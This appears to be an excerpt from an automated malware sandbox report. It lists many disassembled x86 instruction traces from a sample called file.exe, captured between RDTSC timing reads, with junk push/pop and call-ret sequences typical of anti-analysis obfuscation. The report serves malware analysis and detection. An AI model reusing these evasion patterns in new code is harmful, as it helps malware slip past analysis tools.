Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11D0949 second address: 11D0A04 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F04D4C79EA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xor dword ptr [esp], 07092199h 0x00000013 push 00000003h 0x00000015 mov cl, A6h 0x00000017 jmp 00007F04D4C79EAFh 0x0000001c push 00000000h 0x0000001e push 00000000h 0x00000020 push esi 0x00000021 call 00007F04D4C79EA8h 0x00000026 pop esi 0x00000027 mov dword ptr [esp+04h], esi 0x0000002b add dword ptr [esp+04h], 00000014h 0x00000033 inc esi 0x00000034 push esi 0x00000035 ret 0x00000036 pop esi 0x00000037 ret 0x00000038 jmp 00007F04D4C79EB7h 0x0000003d mov dword ptr [ebp+122D1B38h], ebx 0x00000043 push 00000003h 0x00000045 call 00007F04D4C79EB5h 0x0000004a push ebx 0x0000004b jnp 00007F04D4C79EA6h 0x00000051 pop esi 0x00000052 pop esi 0x00000053 call 00007F04D4C79EA9h 0x00000058 jns 00007F04D4C79EB4h 0x0000005e push eax 0x0000005f jmp 00007F04D4C79EB0h 0x00000064 mov eax, dword ptr [esp+04h] 0x00000068 push eax 0x00000069 push edx 0x0000006a pushad 0x0000006b pushad 0x0000006c popad 0x0000006d push eax 0x0000006e pop eax 0x0000006f popad 0x00000070 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D0A04 second address: 11D0A0B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D0A0B second address: 11D0A1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [eax] 0x00000009 pushad 0x0000000a pushad 0x0000000b jc 00007F04D4C79EA6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D0A1E second address: 11D0A27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D0A27 second address: 11D0A2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D0A2B second address: 11D0A2F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D0A2F second address: 11D0AC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b jmp 00007F04D4C79EB7h 0x00000010 pop eax 0x00000011 push 00000000h 0x00000013 push edi 0x00000014 call 00007F04D4C79EA8h 0x00000019 pop edi 0x0000001a mov dword ptr [esp+04h], edi 0x0000001e add dword ptr [esp+04h], 00000014h 0x00000026 inc edi 0x00000027 push edi 0x00000028 ret 0x00000029 pop edi 0x0000002a ret 0x0000002b mov esi, dword ptr [ebp+122D3797h] 0x00000031 mov dword ptr [ebp+1245C745h], esi 0x00000037 lea ebx, dword ptr [ebp+124627E6h] 0x0000003d push 00000000h 0x0000003f push eax 0x00000040 call 00007F04D4C79EA8h 0x00000045 pop eax 0x00000046 mov dword ptr [esp+04h], eax 0x0000004a add dword ptr [esp+04h], 0000001Bh 0x00000052 inc eax 0x00000053 push eax 0x00000054 ret 0x00000055 pop eax 0x00000056 ret 0x00000057 sub di, DAB0h 0x0000005c push eax 0x0000005d pushad 0x0000005e jne 00007F04D4C79EB7h 0x00000064 push eax 0x00000065 push edx 0x00000066 push ecx 0x00000067 pop ecx 0x00000068 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D0BC2 second address: 11D0BE4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 mov eax, dword ptr [eax] 0x00000009 jmp 00007F04D4C82A51h 0x0000000e mov dword ptr [esp+04h], eax 0x00000012 push eax 0x00000013 push edi 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D0BE4 second address: 11D0C3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push 00000000h 0x00000009 push eax 0x0000000a call 00007F04D4C79EA8h 0x0000000f pop eax 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 add dword ptr [esp+04h], 00000014h 0x0000001c inc eax 0x0000001d push eax 0x0000001e ret 0x0000001f pop eax 0x00000020 ret 0x00000021 lea ebx, dword ptr [ebp+124627EFh] 0x00000027 push 00000000h 0x00000029 push ecx 0x0000002a call 00007F04D4C79EA8h 0x0000002f pop ecx 0x00000030 mov dword ptr [esp+04h], ecx 0x00000034 add dword ptr [esp+04h], 00000014h 0x0000003c inc ecx 0x0000003d push ecx 0x0000003e ret 0x0000003f pop ecx 0x00000040 ret 0x00000041 mov edx, 788F4536h 0x00000046 mov esi, dword ptr [ebp+122D3843h] 0x0000004c push eax 0x0000004d pushad 0x0000004e push eax 0x0000004f push edx 0x00000050 push edi 0x00000051 pop edi 0x00000052 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D0C3A second address: 11D0C43 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D0D8E second address: 11D0D94 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F026C second address: 11F028A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F04D4C82A55h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F028A second address: 11F0290 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F0290 second address: 11F0296 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F0559 second address: 11F0588 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jns 00007F04D4C79EA6h 0x00000009 jmp 00007F04D4C79EB3h 0x0000000e pop edi 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push ebx 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 pop ebx 0x00000017 je 00007F04D4C79EAAh 0x0000001d pushad 0x0000001e popad 0x0000001f pushad 0x00000020 popad 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F07F2 second address: 11F0807 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007F04D4C82A4Ch 0x0000000c jg 00007F04D4C82A46h 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F0807 second address: 11F080D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F0BD2 second address: 11F0BD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F0D7F second address: 11F0D83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B7D5B second address: 11B7D64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B7D64 second address: 11B7D68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F1ACC second address: 11F1AF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F04D4C82A52h 0x00000009 jne 00007F04D4C82A4Eh 0x0000000f push eax 0x00000010 pop eax 0x00000011 jnc 00007F04D4C82A46h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F1AF0 second address: 11F1AFC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jp 00007F04D4C79EA6h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F6684 second address: 11F668A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F668A second address: 11F6690 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F6690 second address: 11F6694 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F57E7 second address: 11F57EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B6239 second address: 11B6269 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007F04D4C82A4Eh 0x0000000c jmp 00007F04D4C82A54h 0x00000011 js 00007F04D4C82A4Eh 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FE5A4 second address: 11FE5B0 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 je 00007F04D4C79EA6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1200C29 second address: 1200C47 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F04D4C82A51h 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1200C47 second address: 1200C4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1200D5C second address: 1200D86 instructions: 0x00000000 rdtsc 0x00000002 je 00007F04D4C82A5Fh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pushad 0x0000000f popad 0x00000010 pop eax 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1200E62 second address: 1200E83 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F04D4C79EB2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d jnl 00007F04D4C79EA6h 0x00000013 pop edi 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1200F46 second address: 1200F4A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1200F4A second address: 1200F50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1200F50 second address: 1200F5A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F04D4C82A46h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 120148F second address: 1201493 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 120155C second address: 1201562 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1201562 second address: 1201566 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12016F7 second address: 120170F instructions: 0x00000000 rdtsc 0x00000002 jo 00007F04D4C82A46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F04D4C82A4Bh 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 120170F second address: 1201715 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1201715 second address: 1201719 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12019C2 second address: 12019D7 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F04D4C79EA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e je 00007F04D4C79EA6h 0x00000014 pop esi 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12019D7 second address: 12019DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12020BA second address: 12020C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12020C3 second address: 1202126 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F04D4C82A4Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [esp], eax 0x0000000d movsx edi, bx 0x00000010 mov edi, dword ptr [ebp+122D27B4h] 0x00000016 push 00000000h 0x00000018 push 00000000h 0x0000001a push eax 0x0000001b call 00007F04D4C82A48h 0x00000020 pop eax 0x00000021 mov dword ptr [esp+04h], eax 0x00000025 add dword ptr [esp+04h], 00000017h 0x0000002d inc eax 0x0000002e push eax 0x0000002f ret 0x00000030 pop eax 0x00000031 ret 0x00000032 movsx edi, ax 0x00000035 push 00000000h 0x00000037 sbb di, ABBCh 0x0000003c xchg eax, ebx 0x0000003d jnc 00007F04D4C82A4Eh 0x00000043 jnc 00007F04D4C82A48h 0x00000049 push eax 0x0000004a pop eax 0x0000004b push eax 0x0000004c pushad 0x0000004d push eax 0x0000004e push edx 0x0000004f je 00007F04D4C82A46h 0x00000055 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1202126 second address: 120212A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1203A72 second address: 1203AC8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F04D4C82A52h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F04D4C82A4Ch 0x0000000f nop 0x00000010 push 00000000h 0x00000012 push ecx 0x00000013 call 00007F04D4C82A48h 0x00000018 pop ecx 0x00000019 mov dword ptr [esp+04h], ecx 0x0000001d add dword ptr [esp+04h], 0000001Ah 0x00000025 inc ecx 0x00000026 push ecx 0x00000027 ret 0x00000028 pop ecx 0x00000029 ret 0x0000002a push 00000000h 0x0000002c push 00000000h 0x0000002e mov dword ptr [ebp+122D284Fh], edx 0x00000034 push eax 0x00000035 push edx 0x00000036 push eax 0x00000037 push edx 0x00000038 pushad 0x00000039 popad 0x0000003a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1204612 second address: 120466D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push edi 0x0000000d call 00007F04D4C79EA8h 0x00000012 pop edi 0x00000013 mov dword ptr [esp+04h], edi 0x00000017 add dword ptr [esp+04h], 00000017h 0x0000001f inc edi 0x00000020 push edi 0x00000021 ret 0x00000022 pop edi 0x00000023 ret 0x00000024 push eax 0x00000025 mov di, dx 0x00000028 pop edi 0x00000029 push 00000000h 0x0000002b call 00007F04D4C79EB3h 0x00000030 jno 00007F04D4C79EABh 0x00000036 pop esi 0x00000037 push 00000000h 0x00000039 mov edi, 140F5891h 0x0000003e push eax 0x0000003f push edi 0x00000040 push ecx 0x00000041 push eax 0x00000042 push edx 0x00000043 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12043E9 second address: 12043EF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12043EF second address: 1204409 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F04D4C79EACh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e jns 00007F04D4C79EA6h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12060CA second address: 12060D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12060D2 second address: 12060F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a jg 00007F04D4C79EA6h 0x00000010 popad 0x00000011 pushad 0x00000012 jmp 00007F04D4C79EABh 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1206FCB second address: 1206FCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 120A731 second address: 120A749 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F04D4C79EA6h 0x00000008 jng 00007F04D4C79EA6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jbe 00007F04D4C79EA6h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B2C4D second address: 11B2C56 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 120DCB2 second address: 120DCD4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F04D4C79EB0h 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jns 00007F04D4C79EA8h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 120DCD4 second address: 120DD66 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F04D4C82A50h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push edx 0x0000000d call 00007F04D4C82A48h 0x00000012 pop edx 0x00000013 mov dword ptr [esp+04h], edx 0x00000017 add dword ptr [esp+04h], 0000001Bh 0x0000001f inc edx 0x00000020 push edx 0x00000021 ret 0x00000022 pop edx 0x00000023 ret 0x00000024 clc 0x00000025 push 00000000h 0x00000027 jnl 00007F04D4C82A61h 0x0000002d push 00000000h 0x0000002f push 00000000h 0x00000031 push ebx 0x00000032 call 00007F04D4C82A48h 0x00000037 pop ebx 0x00000038 mov dword ptr [esp+04h], ebx 0x0000003c add dword ptr [esp+04h], 0000001Ch 0x00000044 inc ebx 0x00000045 push ebx 0x00000046 ret 0x00000047 pop ebx 0x00000048 ret 0x00000049 jnl 00007F04D4C82A46h 0x0000004f xchg eax, esi 0x00000050 js 00007F04D4C82A54h 0x00000056 pushad 0x00000057 push eax 0x00000058 push edx 0x00000059 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C549C second address: 11C54BC instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F04D4C79EA6h 0x00000008 jmp 00007F04D4C79EB2h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 120EF32 second address: 120EF36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121240B second address: 12124AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F04D4C79EB2h 0x00000009 popad 0x0000000a popad 0x0000000b push eax 0x0000000c jmp 00007F04D4C79EB6h 0x00000011 nop 0x00000012 push 00000000h 0x00000014 push esi 0x00000015 call 00007F04D4C79EA8h 0x0000001a pop esi 0x0000001b mov dword ptr [esp+04h], esi 0x0000001f add dword ptr [esp+04h], 0000001Ah 0x00000027 inc esi 0x00000028 push esi 0x00000029 ret 0x0000002a pop esi 0x0000002b ret 0x0000002c mov ebx, dword ptr [ebp+122D36FBh] 0x00000032 push 00000000h 0x00000034 mov dword ptr [ebp+12470F2Bh], ebx 0x0000003a push 00000000h 0x0000003c push 00000000h 0x0000003e push eax 0x0000003f call 00007F04D4C79EA8h 0x00000044 pop eax 0x00000045 mov dword ptr [esp+04h], eax 0x00000049 add dword ptr [esp+04h], 0000001Dh 0x00000051 inc eax 0x00000052 push eax 0x00000053 ret 0x00000054 pop eax 0x00000055 ret 0x00000056 jmp 00007F04D4C79EABh 0x0000005b mov edi, dword ptr [ebp+122D19D1h] 0x00000061 push eax 0x00000062 pushad 0x00000063 jbe 00007F04D4C79EACh 0x00000069 push eax 0x0000006a push edx 0x0000006b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1212681 second address: 121268B instructions: 0x00000000 rdtsc 0x00000002 jp 00007F04D4C82A4Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121376F second address: 1213792 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F04D4C79EADh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F04D4C79EAFh 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1214566 second address: 1214570 instructions: 0x00000000 rdtsc 0x00000002 js 00007F04D4C82A4Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12145EC second address: 12145F6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12145F6 second address: 12145FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121573B second address: 12157A1 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F04D4C79EA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e mov bl, 21h 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 push ebp 0x00000015 call 00007F04D4C79EA8h 0x0000001a pop ebp 0x0000001b mov dword ptr [esp+04h], ebp 0x0000001f add dword ptr [esp+04h], 0000001Ch 0x00000027 inc ebp 0x00000028 push ebp 0x00000029 ret 0x0000002a pop ebp 0x0000002b ret 0x0000002c or dword ptr [ebp+1248D34Ch], ecx 0x00000032 push 00000000h 0x00000034 push 00000000h 0x00000036 push ebx 0x00000037 call 00007F04D4C79EA8h 0x0000003c pop ebx 0x0000003d mov dword ptr [esp+04h], ebx 0x00000041 add dword ptr [esp+04h], 00000015h 0x00000049 inc ebx 0x0000004a push ebx 0x0000004b ret 0x0000004c pop ebx 0x0000004d ret 0x0000004e push ecx 0x0000004f movzx edi, di 0x00000052 pop ebx 0x00000053 push eax 0x00000054 pushad 0x00000055 push eax 0x00000056 push edx 0x00000057 push ecx 0x00000058 pop ecx 0x00000059 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1214821 second address: 121483E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007F04D4C82A4Ch 0x0000000c popad 0x0000000d push eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jbe 00007F04D4C82A46h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12166FD second address: 1216701 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12158CD second address: 12158D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1216701 second address: 1216707 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1216707 second address: 1216756 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007F04D4C82A46h 0x00000009 jmp 00007F04D4C82A50h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 jnl 00007F04D4C82A4Eh 0x00000018 jnl 00007F04D4C82A48h 0x0000001e push edi 0x0000001f pop edi 0x00000020 nop 0x00000021 mov dword ptr [ebp+122D1EBDh], edi 0x00000027 push 00000000h 0x00000029 mov dword ptr [ebp+1245C7DBh], eax 0x0000002f xor edi, 7A7C44E4h 0x00000035 push 00000000h 0x00000037 mov dword ptr [ebp+1246016Fh], edi 0x0000003d xchg eax, esi 0x0000003e push eax 0x0000003f push edx 0x00000040 push eax 0x00000041 push edx 0x00000042 pushad 0x00000043 popad 0x00000044 rdtsc
